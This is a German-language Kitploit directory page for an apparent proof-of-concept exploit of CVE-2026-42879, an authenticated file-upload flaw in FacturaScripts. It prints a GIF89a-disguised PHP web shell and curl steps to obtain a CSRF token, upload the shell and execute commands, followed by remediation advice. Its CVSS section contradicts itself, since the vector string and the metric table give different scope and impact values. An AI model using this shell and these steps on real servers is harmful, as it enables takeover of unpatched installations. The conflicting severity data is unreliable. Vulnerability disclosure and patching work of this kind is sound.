Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42879 — FacturaScripts RCE Exploit – Proof of Concept | Kitploit
Tools/GitHubGitHub/guzrex/cve-2026-42879
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubguzrex/cve-2026-42879

CVE-2026-42879

FacturaScripts RCE Exploit – Proof of Concept

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-42879 - FacturaScripts - Authentifizierter uneingeschränkter Datei-Upload durch MIME-Typ-Umgehung

Zusammenfassung

Eine authentifizierte Schwachstelle für uneingeschränkten Datei-Upload existiert in der Produktbild-Upload-Funktion von FacturaScripts. Ein Angreifer mit gültigen Anmeldedaten kann eine PHP-Datei hochladen, die als GIF-Bild getarnt ist (unter Verwendung eines GIF89a-Headers), wodurch die MIME-Typ-Validierung umgangen wird. Die Datei wird mit ihrer ursprünglichen Erweiterung gespeichert, einschließlich ausführbarer Erweiterungen wie .php.


Details

Die Schwachstelle existiert in:

Core/Lib/ExtendedController/ProductImagesTrait.php

Insbesondere in der Methode addImageAction().

Verwundbarer Code

root@kitploit:~
if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}

$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());
Tool herunterladen

Grundursache

  • Die Validierung prüft nur, ob der MIME-Typ "image/" enthält
  • Dies kann umgangen werden, indem GIF89a-Magic-Bytes einer PHP-Datei vorangestellt werden
  • Das System identifiziert die Datei fälschlicherweise als image/gif
  • Die Datei wird mit einer .php-Erweiterung in einem webbasiert zugänglichen Verzeichnis gespeichert

Dateispeicherverhalten

Hochgeladene Dateien werden gespeichert in:

root@kitploit:~
/MyFiles/YYYY/MM/X.php

Wobei X eine automatisch inkrementierende ID ist. Dies ermöglicht direkte Remote-Ausführung:

root@kitploit:~
http://target/MyFiles/2026/03/2.php?cmd=id

Auswirkungen

Eine erfolgreiche Ausnutzung ermöglicht:

Ein Angreifer kann Dateien mit ausführbaren Erweiterungen (z. B. .php) auf den Server hochladen, was je nach Serverkonfiguration zu weiterer Ausnutzung führen könnte.


Proof of Concept (Manuell)

Schritt 1: Bösartige Datei erstellen

root@kitploit:~
cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF

Schritt 2: Authentifizieren

  • Melden Sie sich in der Anwendung an
  • Extrahieren Sie PHPSESSID aus den Browser-Cookies

Schritt 3: CSRF-Token abrufen

root@kitploit:~
curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4

Schritt 4: Shell hochladen

root@kitploit:~
curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[][email protected]"

Schritt 5: Befehl ausführen

root@kitploit:~
curl "http://target/MyFiles/2026/03/2.php?cmd=id"

CVSS v3.1

Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N Basis-Score: 6.3 (Mittel)

MetrikWert
AngriffsvektorNetzwerk (AV:N)
AngriffskomplexitätNiedrig (AC:L)
Erforderliche PrivilegienNiedrig (PR:L)
BenutzerinteraktionKeine (UI:N)
AuswirkungsbereichGeändert (S:C)
VertraulichkeitHoch (C:H)
IntegritätHoch (I:H)
VerfügbarkeitHoch (A:H)

CWE

  • CWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ

Betroffene Produkte

FeldWert
ÖkosystemPackagist
CVE-IDCVE-2026-42879
Paketnamefacturascripts/facturascripts
Betroffene Versionen<= 2025.81
Gepatchte VersionenNoch nicht gepatcht
Behoben inAusstehend

Empfehlungen zur Behebung

  1. Dateierweiterung validieren — lehnen Sie jeden Upload ab, bei dem der Dateiname auf .php, .phtml, .phar oder andere ausführbare Erweiterungen endet, unabhängig vom MIME-Typ
  2. Dateinamen auf dem Server neu generieren — verwenden Sie niemals getClientOriginalName(); weisen Sie einen sicheren UUID-basierten Namen mit einer validierten Erweiterung zu
  3. Uploads außerhalb des Webroots speichern — stellen Sie Dateien über einen Controller bereit, der Inhalte streamt, um direkte URL-Ausführung zu verhindern
  4. Eine Dateityp-Bibliothek verwenden — validieren Sie den tatsächlichen Dateiinhalt (Magic-Bytes + Erweiterung + MIME-Typ) mit einer Bibliothek wie fileinfo, anstatt dem clientseitig übermittelten MIME zu vertrauen

Credits

  • Entdecker: Abdullah Alwasabei / Guzrex